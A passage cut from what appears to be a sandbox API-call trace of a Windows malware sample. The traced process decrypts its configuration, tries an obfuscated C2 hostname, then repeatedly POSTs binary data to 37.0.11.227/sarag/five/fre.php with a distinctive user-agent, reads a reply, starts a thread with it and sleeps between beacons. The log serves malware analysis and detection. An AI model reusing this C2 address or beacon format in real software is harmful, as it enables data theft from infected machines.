pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0314.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.610] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0314.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.611] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0314.611] GetProcessHeap () returned 0x690000 [0314.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0314.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.612] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0314.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.616] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0314.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.616] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0314.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.617] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0314.617] GetProcessHeap () returned 0x690000 [0314.617] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0314.617] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0314.618] GetProcessHeap () returned 0x690000 [0314.618] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0314.618] GetProcessHeap () returned 0x690000 [0314.619] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0314.619] GetProcessHeap () returned 0x690000 [0314.619] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0314.619] GetProcessHeap () returned 0x690000 [0314.619] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0314.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.624] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0314.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.633] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0314.643] GetProcessHeap () returned 0x690000 [0314.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0314.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.644] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0314.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.645] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0314.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.649] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.649] GetProcessHeap () returned 0x690000 [0314.650] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0314.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.651] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0314.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.652] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0314.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.653] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0314.653] GetProcessHeap () returned 0x690000 [0314.653] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0314.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.655] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0314.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.656] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0314.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.657] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0314.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.661] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0314.661] GetProcessHeap () returned 0x690000 [0314.661] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0314.661] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0314.661] GetProcessHeap () returned 0x690000 [0314.661] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0314.661] socket (af=2, type=1, protocol=6) returned 0xab0 [0314.661] connect (s=0xab0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0314.687] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0314.687] GetProcessHeap () returned 0x690000 [0314.687] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0314.687] GetProcessHeap () returned 0x690000 [0314.687] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0314.688] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0314.689] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0314.689] GetProcessHeap () returned 0x690000 [0314.689] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0314.689] GetProcessHeap () returned 0x690000 [0314.690] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0314.690] GetProcessHeap () returned 0x690000 [0314.690] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0314.690] GetProcessHeap () returned 0x690000 [0314.690] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0314.693] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0314.694] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0314.694] GetProcessHeap () returned 0x690000 [0314.694] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0314.694] GetProcessHeap () returned 0x690000 [0314.695] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0314.695] send (s=0xab0, buf=0x6ad508*, len=242, flags=0) returned 242 [0314.695] send (s=0xab0, buf=0x6aba40*, len=159, flags=0) returned 159 [0314.696] GetProcessHeap () returned 0x690000 [0314.696] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0314.696] recv (in: s=0xab0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0314.780] GetProcessHeap () returned 0x690000 [0314.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0314.780] GetProcessHeap () returned 0x690000 [0314.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0314.780] GetProcessHeap () returned 0x690000 [0314.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0314.781] GetProcessHeap () returned 0x690000 [0314.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0314.781] closesocket (s=0xab0) returned 0 [0314.784] GetProcessHeap () returned 0x690000 [0314.784] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0314.784] GetProcessHeap () returned 0x690000 [0314.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0314.785] GetProcessHeap () returned 0x690000 [0314.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0314.785] GetProcessHeap () returned 0x690000 [0314.786] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0314.786] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1788) returned 0xab0 [0314.790] Sleep (dwMilliseconds=0xea60) [0314.791] GetProcessHeap () returned 0x690000 [0314.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0314.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.795] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0314.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.809] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0314.836] GetProcessHeap () returned 0x690000 [0314.836] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0314.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.841] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0314.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.842] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0314.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.843] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.843] GetProcessHeap () returned 0x690000 [0314.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0314.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.845] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0314.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.846] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0314.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.847] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0314.847] GetProcessHeap () returned 0x690000 [0314.847] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0314.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.851] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0314.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.852] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0314.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.854] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0314.854] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.855] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0314.855] GetProcessHeap () returned 0x690000 [0314.855] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0314.855] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0314.855] GetProcessHeap () returned 0x690000 [0314.856] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0314.856] GetProcessHeap () returned 0x690000 [0314.856] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0314.856] GetProcessHeap () returned 0x690000 [0314.856] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0314.856] GetProcessHeap () returned 0x690000 [0314.856] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0314.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.858] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0314.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.866] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0314.876] GetProcessHeap () returned 0x690000 [0314.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0314.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.876] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0314.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.877] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0314.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.878] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.878] GetProcessHeap () returned 0x690000 [0314.879] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0314.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.880] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0314.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.884] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0314.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.885] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0314.885] GetProcessHeap () returned 0x690000 [0314.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0314.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.886] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0314.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.887] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0314.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.888] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0314.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.889] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0314.889] GetProcessHeap () returned 0x690000 [0314.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0314.889] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0314.889] GetProcessHeap () returned 0x690000 [0314.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0314.889] socket (af=2, type=1, protocol=6) returned 0xab4 [0314.890] connect (s=0xab4, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0314.916] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0314.916] GetProcessHeap () returned 0x690000 [0314.916] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0314.916] GetProcessHeap () returned 0x690000 [0314.916] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0314.917] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0314.918] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0314.918] GetProcessHeap () returned 0x690000 [0314.918] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0314.918] GetProcessHeap () returned 0x690000 [0314.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0314.919] GetProcessHeap () returned 0x690000 [0314.919] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0314.919] GetProcessHeap () returned 0x690000 [0314.919] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0314.920] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0314.920] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0314.920] GetProcessHeap () returned 0x690000 [0314.921] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0314.921] GetProcessHeap () returned 0x690000 [0314.921] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0314.921] send (s=0xab4, buf=0x6ad508*, len=242, flags=0) returned 242 [0314.922] send (s=0xab4, buf=0x6aba40*, len=159, flags=0) returned 159 [0314.922] GetProcessHeap () returned 0x690000 [0314.922] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0314.922] recv (in: s=0xab4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0314.990] GetProcessHeap () returned 0x690000 [0314.990] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0314.990] GetProcessHeap () returned 0x690000 [0314.991] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0314.992] GetProcessHeap () returned 0x690000 [0314.993] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0314.993] GetProcessHeap () returned 0x690000 [0314.993] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0314.993] closesocket (s=0xab4) returned 0 [0314.996] GetProcessHeap () returned 0x690000 [0314.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0314.996] GetProcessHeap () returned 0x690000 [0314.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0314.996] GetProcessHeap () returned 0x690000 [0314.997] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0314.997] GetProcessHeap () returned 0x690000 [0314.998] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0314.998] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1608) returned 0xab4 [0315.000] Sleep (dwMilliseconds=0xea60) [0315.002] GetProcessHeap () returned 0x690000 [0315.002] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0315.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.003] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.011] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0315.021] GetProcessHeap () returned 0x690000 [0315.021] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0315.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.023] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0315.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.025] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.029] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.029] GetProcessHeap () returned 0x690000 [0315.029] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0315.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.030] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0315.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.031] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0315.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.032] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0315.032] GetProcessHeap () returned 0x690000 [0315.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0315.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.036] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0315.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.037] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0315.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.047] StrStrA 